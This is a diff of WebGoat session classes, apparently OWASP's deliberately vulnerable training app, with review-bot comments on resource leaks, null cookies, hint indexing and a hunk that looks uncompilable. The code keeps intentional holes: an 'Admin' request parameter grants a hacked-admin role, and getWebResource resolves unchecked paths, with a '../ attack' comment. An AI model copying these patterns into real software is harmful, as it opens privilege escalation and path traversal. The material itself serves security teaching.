(usermap); } - return (usermap); - } - - - /** - * Description of the Method - * - * @return Description of the Return Value - */ - public static synchronized UserTracker instance() - { - - if (instance == null) + 
/** + * Description of the Method + * + * @return Description of the Return Value + */ + public static synchronized UserTracker instance() { - instance = new UserTracker(); + if (instance == null) + { + instance = new UserTracker(); + + } + + return instance; } - return instance; - } + /** + * Description of the Method + * + * @param screen + * Description of the Parameter + * @param s + * Description of the Parameter + */ + public void update(WebSession s, Screen screen) + { + LessonTracker tracker = getLessonTracker(s, screen); - /** - * Description of the Method - * - * @param screen Description of the Parameter - * @param s Description of the Parameter - */ - public void update(WebSession s, Screen screen) - { + // System.out.println( "User [" + s.getUserName() + "] TRACKER: updating " + screen + " LTH + // " + + // tracker.hashCode() ); + tracker.store(s, screen); - LessonTracker tracker = getLessonTracker(s, screen); + HashMap usermap = getUserMap(s.getUserName()); + usermap.put(screen.getTitle(), tracker); - //System.out.println( "User [" + s.getUserName() + "] TRACKER: updating " + screen + " LTH " + tracker.hashCode() ); - tracker.store(s, screen); - - HashMap usermap = getUserMap(s.getUserName()); - usermap.put(screen.getTitle(), tracker); - - } + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java index e34b28b2c..e7723a0b1 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/ValidationException.java 
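Review bot: In `getAllUsers` and `deleteUser`, `usersDB.close()` is the last statement inside the `try`, so any exception thrown after `usersDB.open()` skips it and leaves the user database open for the next caller, and the empty `catch (Exception e) {}` on both methods hides that this happened — `getAllUsers` then returns a silently partial list and `deleteUser` silently fails to delete. Moving `close()` into a `finally` and recording the failure fixes both; the sketch below shows `getAllUsers`, and the same shape applies to `deleteUser`. Since `close()` is already inside the catch-all today, it presumably declares a checked exception, hence the nested try in `finally`. Separately, the static `storage` map is read and written from `getUserMap` with no synchronization while `instance()` is `synchronized`; if this is reached from concurrent servlet threads (not visible here), a `ConcurrentHashMap` or a lock around `getUserMap` would be needed.
```java
public Collection getAllUsers(String roleName)
{
    synchronized (usersDB)
    {
        Collection allUsers = new ArrayList();
        try
        {
            usersDB.open();
            // … unchanged: iterate users and roles, collect matching usernames …
        } catch (Exception e)
        {
            // TODO(review): log here; callers otherwise receive a partial list with no indication
        } finally
        {
            try
            {
                usersDB.close();
            } catch (Exception closeFailure)
            {
                // TODO(review): log; nothing further can be done at this point
            }
        }
        return allUsers;
    }
}
```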
@@ -1,51 +1,48 @@ + package org.owasp.webgoat.session; -/******************************************************************************* +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. 
* * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ValidationException extends Exception { - /** + /** * */ private static final long serialVersionUID = -8358754606830400708L; - public ValidationException() - { - super(); - } + { + super(); + } - - public ValidationException(String message) - { - super(message); - } + public ValidationException(String message) + { + super(message); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java index 3320558ea..a76cc35bf 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/WebSession.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.session; import java.io.IOException; 
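Review bot: As rendered, the declaration line `public ValidationException()` appears only on the removed side, leaving `{ super(); }` as a bare initializer block on the new side; that would not compile (`super()` is only legal as the first statement of a constructor), so either the `+` line was lost in rendering or the declaration was dropped, and it is worth checking the actual file before merging. The Javadoc block above `serialVersionUID` is empty; either describe the field or drop the comment.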
@@ -13,43 +14,40 @@ import java.util.Hashtable; import java.util.List; import java.util.Map; import java.util.Vector; - import javax.servlet.ServletContext; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; - import org.owasp.webgoat.lessons.AbstractLesson; import org.owasp.webgoat.lessons.Category; import org.owasp.webgoat.lessons.RandomLessonAdapter; import org.owasp.webgoat.lessons.SequentialLessonAdapter; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * @@ -85,9 +83,9 @@ public class WebSession */ public final static String COLOR = "color"; - /** - * Description of the Field - */ + /** + * Description of the Field + */ public final static int ERROR = 0; public static final String STAGE = "stage"; @@ -107,7 +105,6 @@ public class WebSession */ public final static String RESTART = "Restart"; - /** * Description of the Field */ @@ -124,9 +121,9 @@ public class WebSession public final static String SESSION = "Session"; public final static String SHOWSOURCE = "ShowSource"; - + public final static String SHOWSOLUTION = "ShowSolution"; - + public final static String SHOWHINTS = "ShowHints"; public final static String SHOW = "show"; @@ -151,7 +148,7 @@ public class WebSession public final static int WELCOME = -1; private WebgoatContext webgoatContext; - + private ServletContext context = null; private Course course; @@ -173,7 +170,7 @@ public class WebSession private boolean isDebug = false; private boolean hasHackedHackableAdmin = false; - private StringBuffer message = new StringBuffer( "" ); + private StringBuffer message = new StringBuffer(""); private ParameterParser myParser; 
@@ -183,7 +180,7 @@ public class WebSession private String servletName; - private HashMap session = new HashMap(); + private HashMap session = new HashMap(); private boolean showCookies = false; @@ -196,16 +193,18 @@ public class WebSession private boolean showSolution = false; private boolean completedHackableAdmin = false; - + private int currentMenu; /** * Constructor for the WebSession object * - * @param servlet Description of the Parameter - * @param context Description of the Parameter + * @param servlet + * Description of the Parameter + * @param context + * Description of the Parameter */ - public WebSession(WebgoatContext webgoatContext, ServletContext context ) + public WebSession(WebgoatContext webgoatContext, ServletContext context) { this.webgoatContext = webgoatContext; // initialize from web.xml @@ -216,28 +215,30 @@ public class WebSession showRequest = webgoatContext.isShowRequest(); this.context = context; course = new Course(); - course.loadCourses( webgoatContext, context, "/" ); + course.loadCourses(webgoatContext, context, "/"); } - public static synchronized Connection getConnection(WebSession s) - throws SQLException, ClassNotFoundException + public static synchronized Connection getConnection(WebSession s) throws SQLException, ClassNotFoundException { return DatabaseUtilities.getConnection(s); } - public static void returnConnection(WebSession s) { + public static void returnConnection(WebSession s) + { DatabaseUtilities.returnConnection(s.getUserName()); } - + /** * Description of the Method * - * @param key Description of the Parameter - * @param value Description of the Parameter + * @param key + * Description of the Parameter + * @param value + * Description of the Parameter */ - public void add( String key, Object value ) + public void add(String key, Object value) { - session.put( key, value ); + session.put(key, value); } /** 
@@ -245,7 +246,7 @@ public class WebSession */ public void clearMessage() { - message.setLength( 0 ); + message.setLength(0); } /** @@ -255,12 +256,12 @@ public class WebSession { Cookie[] cookies = request.getCookies(); - for ( int loop = 0; loop < cookies.length; loop++ ) + for (int loop = 0; loop < cookies.length; loop++) { - if ( !cookies[loop].getName().startsWith( "JS" ) ) + if (!cookies[loop].getName().startsWith("JS")) {// skip jsessionid cookie - cookies[loop].setMaxAge( 0 );// mark for deletion by browser - response.addCookie( cookies[loop] ); + cookies[loop].setMaxAge(0);// mark for deletion by browser + response.addCookie(cookies[loop]); } } } @@ -268,12 +269,13 @@ public class WebSession /** * Description of the Method * - * @param key Description of the Parameter + * @param key + * Description of the Parameter * @return Description of the Return Value */ - public Object get( String key ) + public Object get(String key) { - return ( session.get( key ) ); + return (session.get(key)); } /** @@ -295,13 +297,13 @@ public class WebSession { roles.add(AbstractLesson.ADMIN_ROLE); } - + return roles; } - + public String getRole() { - + String role = ""; if (isAdmin()) { @@ -310,7 +312,7 @@ public class WebSession else if (isHackedAdmin()) { role = AbstractLesson.HACKED_ADMIN_ROLE; - } + } else if (isChallenge()) { role = AbstractLesson.CHALLENGE_ROLE; @@ -319,10 +321,10 @@ public class WebSession { role = AbstractLesson.USER_ROLE; } - + return role; } - + /** * Gets the course attribute of the WebSession object * @@ -333,7 +335,7 @@ public class WebSession return course; } - public void setCourse( Course course ) + public void setCourse(Course course) { this.course = course; } @@ -345,10 +347,10 @@ public class WebSession */ public int getCurrentScreen() { - return ( currentScreen ); + return (currentScreen); } - public void setCurrentScreen( int screen ) + public void setCurrentScreen(int screen) { currentScreen = screen; } 
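Review bot: In the eatCookies hunk, `Cookie[] cookies = request.getCookies();` is dereferenced as `cookies.length` with no null check, and the servlet API returns null when the request carries no cookies, so a cookie-less request throws a NullPointerException here; `if (cookies == null) return;` before the loop closes this. The same missing check is in getCookie (`@@ -472`), which iterates `getRequest().getCookies()` the same way. The rest of this hunk is whitespace only.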
@@ -357,7 +359,7 @@ public class WebSession { return getCurrentLesson().getLink() + "&" + RESTART + "=" + getCurrentScreen(); } - + public String getCurrentLink() { String thisLink = "attack"; @@ -383,19 +385,19 @@ public class WebSession public AbstractLesson getCurrentLesson() { - return getCourse().getLesson( this, getCurrentScreen(), getRoles() ); + return getCourse().getLesson(this, getCurrentScreen(), getRoles()); } - + public AbstractLesson getLesson(int id) { - return getCourse().getLesson( this, id, getRoles() ); + return getCourse().getLesson(this, id, getRoles()); } - + public List getLessons(Category category) { - return getCourse().getLessons( this, category, getRoles() ); + return getCourse().getLessons(this, category, getRoles()); } - + /** * Gets the hint1 attribute of the WebSession object * @@ -403,18 +405,17 @@ public class WebSession */ private int getHintNum() { - return ( hintNum ); + return (hintNum); } public String getHint() { String hint = null; int hints = getCurrentLesson().getHintCount(this); - if (getHintNum() > hints) - hintNum = -1; - if ( getHintNum() >= 0 ) - // FIXME - hint = getCurrentLesson().getHint( this, getHintNum() ); + if (getHintNum() > hints) hintNum = -1; + if (getHintNum() >= 0) + // FIXME + hint = getCurrentLesson().getHint(this, getHintNum()); return hint; } 
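Review bot: In getHint, `if (getHintNum() > hints) hintNum = -1;` still lets `hintNum == hints` reach `getCurrentLesson().getHint(this, getHintNum())`, while getNextHint later in this file treats `maxHints - 1` as the highest valid index, so the bound here looks off by one; `if (getHintNum() >= hints) hintNum = -1;` would make the two agree. I infer the zero-based convention from the `// Hints are indexed from 0` comment in getNextHint, so confirm against AbstractLesson.getHint before changing it. The `// FIXME` now sits between a braceless `if` and its statement; braces would keep the comment from being mistaken for the body.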
@@ -423,25 +424,25 @@ public class WebSession { Vector params = null; - if ( showParams() && getParser() != null ) + if (showParams() && getParser() != null) { params = new Vector(); Enumeration e = getParser().getParameterNames(); - while ( ( e != null ) && e.hasMoreElements() ) + while ((e != null) && e.hasMoreElements()) { String name = (String) e.nextElement(); - String[] values = getParser().getParameterValues( name ); + String[] values = getParser().getParameterValues(name); - for ( int loop = 0; ( values != null ) && ( loop < values.length ); loop++ ) + for (int loop = 0; (values != null) && (loop < values.length); loop++) { - params.add( new Parameter( name, values[loop] ) ); + params.add(new Parameter(name, values[loop])); // params.add( name + " -> " + values[loop] ); } } - Collections.sort( params ); + Collections.sort(params); } return params; @@ -451,16 +452,11 @@ public class WebSession { List cookies = null; - if ( showCookies() ) - cookies = Arrays.asList( request.getCookies() ); + if (showCookies()) cookies = Arrays.asList(request.getCookies()); /* - * List cookies = new Vector(); - * - * HttpServletRequest request = getRequest(); Cookie[] cookies = request.getCookies(); - * - * if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); } - * + * List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies = + * request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); } * for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie = cookies[i]; * cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " + * cookie.getValue() ) ); } 
@@ -472,41 +468,39 @@ public class WebSession /** * Gets the cookie attribute of the CookieScreen object * - * @param s Description of the Parameter + * @param s + * Description of the Parameter * @return The cookie value */ - public String getCookie( String cookieName ) + public String getCookie(String cookieName) { Cookie[] cookies = getRequest().getCookies(); - for ( int i = 0; i < cookies.length; i++ ) + for (int i = 0; i < cookies.length; i++) { - if ( cookies[i].getName().equalsIgnoreCase( cookieName ) ) - { - return ( cookies[i].getValue() ); - } + if (cookies[i].getName().equalsIgnoreCase(cookieName)) { return (cookies[i].getValue()); } } - return ( null ); + return (null); } - + public String getSource() { return "Sorry. No Java Source viewing available."; - //return getCurrentLesson().getSource(this); + // return getCurrentLesson().getSource(this); } public String getSolution() { return "Sorry. No solution is available."; - //return getCurrentLesson().getSolution(this); + // return getCurrentLesson().getSolution(this); } public String getInstructions() { - return getCurrentLesson().getInstructions(this); + return getCurrentLesson().getInstructions(this); } - + /** * Gets the message attribute of the WebSession object * @@ -514,7 +508,7 @@ public class WebSession */ public String getMessage() { - return ( message.toString() ); + return (message.toString()); } /** @@ -524,7 +518,7 @@ public class WebSession */ public ParameterParser getParser() { - return ( myParser ); + return (myParser); } /** @@ -534,7 +528,7 @@ public class WebSession */ public int getPreviousScreen() { - return ( previousScreen ); + return (previousScreen); } /** @@ -547,7 +541,7 @@ public class WebSession return request; } - public void setRequest( HttpServletRequest request ) + public void setRequest(HttpServletRequest request) { this.request = request; } 
@@ -569,19 +563,20 @@ public class WebSession */ public String getServletName() { - return ( servletName ); + return (servletName); } /** * Gets the sourceFile attribute of the WebSession object * - * @param screen Description of the Parameter + * @param screen + * Description of the Parameter * @return The sourceFile value */ - public String getWebResource( String fileName ) + public String getWebResource(String fileName) { // Note: doesn't work for admin path! Maybe with a ../ attack - return ( context.getRealPath( fileName )); + return (context.getRealPath(fileName)); } /** @@ -591,7 +586,7 @@ public class WebSession */ public boolean isAdmin() { - return ( isAdmin ); + return (isAdmin); } /** @@ -601,7 +596,7 @@ public class WebSession */ public boolean isHackedAdmin() { - return ( isHackedAdmin ); + return (isHackedAdmin); } /** @@ -611,7 +606,7 @@ public class WebSession */ public boolean completedHackableAdmin() { - return ( completedHackableAdmin ); + return (completedHackableAdmin); } /** 
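Review bot: getWebResource hands `fileName` straight to `context.getRealPath(fileName)`, and the surviving comment `// Note: doesn't work for admin path! Maybe with a ../ attack` documents that the result is not confined to the intended directory; the reformat keeps this as-is. Unless this is a deliberate lesson surface, canonicalize both `context.getRealPath("/")` and the returned path (e.g. via `new java.io.File(p).getCanonicalPath()`) and return null when the latter does not start with the former. The Javadoc also still says `@param screen` for a parameter named `fileName`; it should read `@param fileName the web-relative resource path to resolve`.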
@@ -621,41 +616,40 @@ public class WebSession */ public boolean isAuthenticated() { - return ( isAuthenticated ); + return (isAuthenticated); } - + private Map lessonSessions = new Hashtable(); - public boolean isAuthenticatedInLesson(AbstractLesson lesson) { boolean authenticated = false; - + LessonSession lessonSession = getLessonSession(lesson); if (lessonSession != null) { authenticated = lessonSession.isAuthenticated(); } - //System.out.println("Authenticated for lesson " + lesson + "? " + authenticated); - + // System.out.println("Authenticated for lesson " + lesson + "? " + authenticated); + return authenticated; } - + public boolean isAuthorizedInLesson(int employeeId, String functionId) { return getCurrentLesson().isAuthorized(this, employeeId, functionId); } - + public boolean isAuthorizedInLesson(String role, String functionId) { return getCurrentLesson().isAuthorized(this, role, functionId); } - + public int getUserIdInLesson() throws ParameterNotFoundException { return getCurrentLesson().getUserId(this); } - + public String getUserNameInLesson() throws ParameterNotFoundException { return getCurrentLesson().getUserName(this); @@ -667,12 +661,12 @@ public class WebSession LessonSession lessonSession = new LessonSession(); lessonSessions.put(lesson, lessonSession); } - + public void closeLessonSession(AbstractLesson lesson) { lessonSessions.remove(lesson); } - + public LessonSession getLessonSession(AbstractLesson lesson) { return (LessonSession) lessonSessions.get(lesson); @@ -685,10 +679,7 @@ public class WebSession */ public boolean isChallenge() { - if ( getCurrentLesson() != null ) - { - return ( Category.CHALLENGE.equals(getCurrentLesson().getCategory())); - } + if (getCurrentLesson() != null) { return (Category.CHALLENGE.equals(getCurrentLesson().getCategory())); } return false; } 
@@ -699,18 +690,19 @@ public class WebSession */ public boolean isColor() { - return ( isColor ); + return (isColor); } /** * Gets the screen attribute of the WebSession object * - * @param value Description of the Parameter + * @param value + * Description of the Parameter * @return The screen value */ - public boolean isScreen( int value ) + public boolean isScreen(int value) { - return ( getCurrentScreen() == value ); + return (getCurrentScreen() == value); } /** @@ -720,17 +712,18 @@ public class WebSession */ public boolean isUser() { - return ( !isAdmin && !isChallenge() ); + return (!isAdmin && !isChallenge()); } /** * Sets the message attribute of the WebSession object * - * @param text The new message value + * @param text + * The new message value */ - public void setMessage( String text ) + public void setMessage(String text) { - message.append( "
" + " * " + text); + message.append("
" + " * " + text); } /** @@ -740,10 +733,9 @@ public class WebSession */ public boolean showCookies() { - return ( showCookies ); + return (showCookies); } - /** * Description of the Method * @@ -751,7 +743,7 @@ public class WebSession */ public boolean showParams() { - return ( showParams ); + return (showParams); } /** @@ -761,7 +753,7 @@ public class WebSession */ public boolean showRequest() { - return ( showRequest ); + return (showRequest); } /** @@ -771,12 +763,12 @@ public class WebSession */ public boolean showSource() { - return ( showSource ); + return (showSource); } public boolean showSolution() { - return ( showSolution ); + return (showSolution); } /** @@ -791,17 +783,19 @@ public class WebSession // System.out.println("Name: " + getRequest().getUserPrincipal().getName( ) ); return getRequest().getUserPrincipal().getName(); } - + /** * Parse parameters from the given request, handle any servlet commands, and update this session * based on the parameters. * - * @param request Description of the Parameter - * @param response Description of the Parameter - * @param name Description of the Parameter + * @param request + * Description of the Parameter + * @param response + * Description of the Parameter + * @param name + * Description of the Parameter */ - public void update( HttpServletRequest request, HttpServletResponse response, String name ) - throws IOException + public void update(HttpServletRequest request, HttpServletResponse response, String name) throws IOException { String content = null; 
@@ -810,22 +804,22 @@ public class WebSession this.response = response; this.servletName = name; - if ( myParser == null ) + if (myParser == null) { - myParser = new ParameterParser( request ); + myParser = new ParameterParser(request); } else { - myParser.update( request ); + myParser.update(request); } // System.out.println("Current Screen 1: " + currentScreen ); // System.out.println("Previous Screen 1: " + previousScreen ); // FIXME: requires ?Logout=true // FIXME: doesn't work right -- no reauthentication - if ( myParser.getRawParameter( LOGOUT, null ) != null ) + if (myParser.getRawParameter(LOGOUT, null) != null) { - System.out.println( "Logout " + request.getUserPrincipal() ); + System.out.println("Logout " + request.getUserPrincipal()); eatCookies(); request.getSession().invalidate(); currentScreen = WELCOME; @@ -835,9 +829,9 @@ public class WebSession // There are several scenarios where we want the first lesson to be loaded // 1) Previous screen is Welcome - Start of the course // 2) After a logout and after the session has been reinitialized - if ( ( this.getPreviousScreen() == WebSession.WELCOME ) || ( getRequest().getSession( false ) != null && + if ((this.getPreviousScreen() == WebSession.WELCOME) || (getRequest().getSession(false) != null && // getRequest().getSession(false).isNew() && - this.getCurrentScreen() == WebSession.WELCOME && this.getPreviousScreen() == WebSession.ERROR ) ) + this.getCurrentScreen() == WebSession.WELCOME && this.getPreviousScreen() == WebSession.ERROR)) { currentScreen = course.getFirstLesson().getScreenId(); hintNum = -1; 
@@ -852,95 +846,95 @@ public class WebSession { // If the request is new there should be no parameters. // This can occur from a session timeout or a the starting of a new course. - if ( !request.getSession().isNew() ) + if (!request.getSession().isNew()) { - currentScreen = myParser.getIntParameter( SCREEN, currentScreen ); + currentScreen = myParser.getIntParameter(SCREEN, currentScreen); } else { - if ( !myParser.getRawParameter( SCREEN, "NULL" ).equals( "NULL" ) ) + if (!myParser.getRawParameter(SCREEN, "NULL").equals("NULL")) { - this.setMessage( "Session Timeout - Starting new Session." ); + this.setMessage("Session Timeout - Starting new Session."); } } - } - catch ( Exception e ) + } catch (Exception e) { } // clear variables when switching screens - if ( this.getCurrentScreen() != this.getPreviousScreen() ) + if (this.getCurrentScreen() != this.getPreviousScreen()) { - if ( webgoatContext.isDebug() ) + if (webgoatContext.isDebug()) { - setMessage( "Changed to a new screen, clearing cookies and hints" ); + setMessage("Changed to a new screen, clearing cookies and hints"); } eatCookies(); hintNum = -1; } - else if (myParser.getRawParameter( STAGE, null ) != null) + else if (myParser.getRawParameter(STAGE, null) != null) { AbstractLesson al = getCurrentLesson(); if (al instanceof SequentialLessonAdapter) { - SequentialLessonAdapter sla = (SequentialLessonAdapter) al; - int stage = myParser.getIntParameter(STAGE, sla.getStage(this)); - if (stage > 0 && stage <= sla.getStageCount()) - sla.setStage(this, stage); + SequentialLessonAdapter sla = (SequentialLessonAdapter) al; + int stage = myParser.getIntParameter(STAGE, sla.getStage(this)); + if (stage > 0 && stage <= sla.getStageCount()) sla.setStage(this, stage); } else if (al instanceof RandomLessonAdapter) { - try - { - RandomLessonAdapter rla = (RandomLessonAdapter) al; - int stage = myParser.getIntParameter(STAGE) - 1; - String[] stages = rla.getStages(); - if (stage>=0 && stage < stages.length) - 
rla.setStage(this, stages[stage]); - } catch (ParameterNotFoundException pnfe) {} + try + { + RandomLessonAdapter rla = (RandomLessonAdapter) al; + int stage = myParser.getIntParameter(STAGE) - 1; + String[] stages = rla.getStages(); + if (stage >= 0 && stage < stages.length) rla.setStage(this, stages[stage]); + } catch (ParameterNotFoundException pnfe) + { + } } } // else update global variables for the current screen else { // Handle "restart" commands - int lessonId = myParser.getIntParameter( RESTART, -1 ); - if ( lessonId != -1 ) + int lessonId = myParser.getIntParameter(RESTART, -1); + if (lessonId != -1) { restartLesson(lessonId); } - //if ( myParser.getBooleanParameter( RESTART, false ) ) - //{ - // getCurrentLesson().getLessonTracker( this ).getLessonProperties().setProperty( CHALLENGE_STAGE, "1" ); - //} - + // if ( myParser.getBooleanParameter( RESTART, false ) ) + // { + // getCurrentLesson().getLessonTracker( this ).getLessonProperties().setProperty( + // CHALLENGE_STAGE, "1" ); + // } + // Handle "show" commands - String showCommand = myParser.getStringParameter( SHOW, null ); - if ( showCommand != null ) + String showCommand = myParser.getStringParameter(SHOW, null); + if (showCommand != null) { - if ( showCommand.equalsIgnoreCase( SHOW_PARAMS ) ) + if (showCommand.equalsIgnoreCase(SHOW_PARAMS)) { showParams = !showParams; } - else if ( showCommand.equalsIgnoreCase( SHOW_COOKIES ) ) + else if (showCommand.equalsIgnoreCase(SHOW_COOKIES)) { showCookies = !showCookies; } - else if ( showCommand.equalsIgnoreCase( SHOW_SOURCE ) ) + else if (showCommand.equalsIgnoreCase(SHOW_SOURCE)) { content = getSource(); - //showSource = true; + // showSource = true; } - else if ( showCommand.equalsIgnoreCase( SHOW_SOLUTION ) ) + else if (showCommand.equalsIgnoreCase(SHOW_SOLUTION)) { content = getSolution(); - //showSource = true; + // showSource = true; } - else if ( showCommand.equalsIgnoreCase( SHOW_NEXTHINT ) ) + else if 
(showCommand.equalsIgnoreCase(SHOW_NEXTHINT)) { getNextHint(); } - else if ( showCommand.equalsIgnoreCase( SHOW_PREVIOUSHINT ) ) + else if (showCommand.equalsIgnoreCase(SHOW_PREVIOUSHINT)) { getPreviousHint(); } 
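Review bot: The `} catch (Exception e) { }` wrapping the SCREEN-parameter handling in this hunk still swallows every exception silently, so a malformed `screen` value leaves currentScreen unchanged with no trace, and the `catch (ParameterNotFoundException pnfe) { }` around the RandomLessonAdapter stage handling does the same. At minimum report the failure in the style the file already uses, e.g. `catch (Exception e) { System.out.println("Ignoring bad screen parameter: " + e); }`, and narrow the first catch to whatever getIntParameter actually throws if that is a declared type. The enclosing update() method starts in the `@@ -810` hunk above and ends in the `@@ -948` hunk below.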
@@ -948,58 +942,58 @@ public class WebSession } - isAdmin = request.isUserInRole( WEBGOAT_ADMIN ); - isHackedAdmin = myParser.getBooleanParameter( ADMIN, isAdmin ); - if ( isHackedAdmin ) + isAdmin = request.isUserInRole(WEBGOAT_ADMIN); + isHackedAdmin = myParser.getBooleanParameter(ADMIN, isAdmin); + if (isHackedAdmin) { System.out.println("Hacked admin"); hasHackedHackableAdmin = true; } - isColor = myParser.getBooleanParameter( COLOR, isColor ); - isDebug = myParser.getBooleanParameter( DEBUG, isDebug ); + isColor = myParser.getBooleanParameter(COLOR, isColor); + isDebug = myParser.getBooleanParameter(DEBUG, isDebug); // System.out.println( "showParams:" + showParams ); // System.out.println( "showSource:" + showSource ); // System.out.println( "showSolution:" + showSolution ); // System.out.println( "showCookies:" + showCookies ); // System.out.println( "showRequest:" + showRequest ); - + if (content != null) { response.setContentType("text/html"); PrintWriter out = new PrintWriter(response.getOutputStream()); - out.print(content); + out.print(content); out.flush(); out.close(); } } - + private void restartLesson(int lessonId) { AbstractLesson al = getLesson(lessonId); System.out.println("Restarting lesson: " + al); - al.getLessonTracker( this ).setCompleted(false); + al.getLessonTracker(this).setCompleted(false); if (al instanceof SequentialLessonAdapter) { - SequentialLessonAdapter sla = (SequentialLessonAdapter) al; - sla.getLessonTracker( this ).setStage(1); + SequentialLessonAdapter sla = (SequentialLessonAdapter) al; + sla.getLessonTracker(this).setStage(1); } } /** * @param string */ - public void setHasHackableAdmin( String role ) + public void setHasHackableAdmin(String role) { - hasHackedHackableAdmin = ( AbstractLesson.HACKED_ADMIN_ROLE.equals( role ) & hasHackedHackableAdmin ); + hasHackedHackableAdmin = (AbstractLesson.HACKED_ADMIN_ROLE.equals(role) & hasHackedHackableAdmin); // if the user got the Admin=true parameter correct AND they accessed an 
admin screen - if ( hasHackedHackableAdmin ) + if (hasHackedHackableAdmin) { completedHackableAdmin = true; } } - + /** * @return Returns the isDebug. */ @@ -1009,12 +1003,13 @@ public class WebSession } /** - * @param header - request header value to return + * @param header - + * request header value to return * @return */ - public String getHeader( String header ) + public String getHeader(String header) { - return getRequest().getHeader( header ); + return getRequest().getHeader(header); } public String getNextHint() @@ -1023,14 +1018,14 @@ public class WebSession // FIXME int maxHints = getCurrentLesson().getHintCount(this); - if ( hintNum < maxHints - 1 ) + if (hintNum < maxHints - 1) { hintNum++; // Hints are indexed from 0 - getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 ); + getCurrentLesson().getLessonTracker(this).setMaxHintLevel(getHintNum() + 1); - hint = (String) getCurrentLesson().getHint( this, getHintNum() ); + hint = (String) getCurrentLesson().getHint(this, getHintNum()); } return hint; @@ -1040,30 +1035,31 @@ public class WebSession { String hint = null; - if ( hintNum > 0 ) + if (hintNum > 0) { hintNum--; // Hints are indexed from 0 - getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 ); + getCurrentLesson().getLessonTracker(this).setMaxHintLevel(getHintNum() + 1); - hint = (String) getCurrentLesson().getHint( this, getHintNum() ); + hint = (String) getCurrentLesson().getHint(this, getHintNum()); } return hint; } - public void setCurrentMenu(Integer ranking) + public void setCurrentMenu(Integer ranking) { currentMenu = ranking.intValue(); } - + public int getCurrentMenu() { - return currentMenu; + return currentMenu; } - - public WebgoatContext getWebgoatContext() { + + public WebgoatContext getWebgoatContext() + { return webgoatContext; } } 
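Review bot: In the `if (content != null)` block of this hunk, `new PrintWriter(response.getOutputStream())` wraps the raw byte stream without a charset, so the `text/html` body is encoded with the JVM default rather than anything the Content-Type advertises, and `out.close()` is skipped if `out.print` throws; `response.setCharacterEncoding("UTF-8");` followed by `PrintWriter out = response.getWriter();` with the close moved into a `finally` fixes both. In setHasHackableAdmin, `AbstractLesson.HACKED_ADMIN_ROLE.equals(role) & hasHackedHackableAdmin` uses the non-short-circuit `&`; the result is identical for two booleans, but `&&` states the intent.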
